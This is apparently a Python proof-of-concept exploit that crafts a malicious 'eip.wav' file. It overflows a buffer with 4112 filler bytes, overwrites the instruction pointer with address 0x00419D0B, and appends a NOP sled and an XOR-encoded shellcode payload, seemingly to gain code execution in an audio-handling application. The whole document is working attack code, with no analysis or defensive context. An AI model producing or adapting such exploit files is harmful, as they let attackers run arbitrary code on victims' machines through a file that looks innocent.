from struct import pack

buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\xf9\xe2\xb7\xa3\x78\x0b\x6c"
buf += b"\x76\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\x05\xaa\x34\x47\x88\xe3\xac\x76\xf9\xe2\xf6\xf2\x39"
buf += b"\x5b\x3e\x27\xaf\xaa\x86\x71\x1d\x43\xe7\x24\x99\xaa"
buf += b"\x3c\xf1\x60\x43\xe7\x24\xd9\xaa\x3c\xd1\x28\x43\x63"
buf += b"\xc1\xb3\xa8\xfa\x92\xb1\x43\x5d\xb6\x55\xde\xd6\xdf"
buf += b"\x7a\x27\x4c\x37\x38\x2b\xba\xe2\x79\xca\x8e\x9b\xab"
buf += b"\xa3\xe6\xeb\xf3\x59\x4c\xfd\xbb\xde\xff\xa2\xa8\x80"
buf += b"\xec\xfe\xf9\xe2\xb7\xeb\xfd\xcb\x18\x11\xb1\xe3\x67"
buf += b"\xf3\xf3\x43\x74\x32\x72\xa2\x97\xea\x79\xdb\x8f\x20"
buf += b"\xb1\x1d\x7e\xe2\xf3\x3f\xe4\x3e\xf8\x34\xfa\x92\xb1"
buf += b"\x43\x5d\xb6\x55\xa3\x76\x6a\x75\x4a\x6d\xb7\xc1\x02"
buf += b"\xc2\x52\x34\x08\x20\x52\xf1\xa7\x8e\x72\x0d\xd3\x34"
buf += b"\x32\x72\xa2\x93\xea\x79\xdb\x0a\x37\x72\xee\xff\xe7"
buf += b"\xf3\x4b\x70\x3f\xf8\x32\xf6\x28\x7c\x83\x24\x77\x29"
buf += b"\xa3\xef\xe2\x20\x55\x35\x2c\xb8\xba\xf6\xfa\x39\x51"
buf += b"\x24\xf5\x15\xc2\xf6\xf1\x87\xeb\x34\x37\xa0\xb8\xff"
buf += b"\x28\x6a\xe2\x3b\x89\x06\x1d\xea\xeb\xc2\x0a\x6c\x76"
buf += b"\xf9\xe2\xb7\xa3\x78\x43\xe1\xfb\xf8\xe3\xb7\xa3\x39"
buf += b"\xb1\x5d\xfd\x96\x65\x48\x76\xc3\xfb\xd9\xd4\xaf\xa3"
buf += b"\x0d\x05\xed\xb6\xf1\x89\x2c\xaa\x34\x67\x50\x37\x6a"
buf += b"\x0a\xf3\x62\x4c\x43\x0d\x0e\xd7\x31\xea\x90\xd8\xc9"
buf += b"\x78\x52\x2d\xff\x23\x1d\x62\xc0\x15\x6f\x42\x13\x81"
buf += b"\x87\xb7\xa3\x78\x0b\x6c\x76"

n=b"\x90"*32
buffer=b'A'*4112
eip=pack('<L',0x00419D0B)
f = open("eip.wav","wb")
f.write(buffer)
f.close()
f = open("eip.wav","ab")
f.write(eip)
f.write(n)
f.write(buf)
f.close()
